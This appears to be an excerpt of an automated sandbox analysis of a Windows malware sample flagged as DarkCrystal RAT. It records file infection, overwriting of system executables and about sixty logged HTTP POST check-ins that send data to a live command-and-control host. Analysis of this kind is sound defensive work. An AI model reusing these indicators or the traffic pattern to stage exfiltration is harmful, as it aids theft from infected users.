                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.pdb source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:\Users\User\Desktop\payload\obj\Debug\payload.pdb source: Zn0uX5K1ez.exe

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0083A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_0083A69B
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_0084C220
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0085B348 FindFirstFileExA,2_2_0085B348
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\blockhostnet\msinto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49706 -> 37.44.238.250:80
                                    Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                                    Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 162168Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1820Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1120Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 664930cm.n9shka.topContent-Length: 1112Expect: 100-continueConnection: Keep-Alive
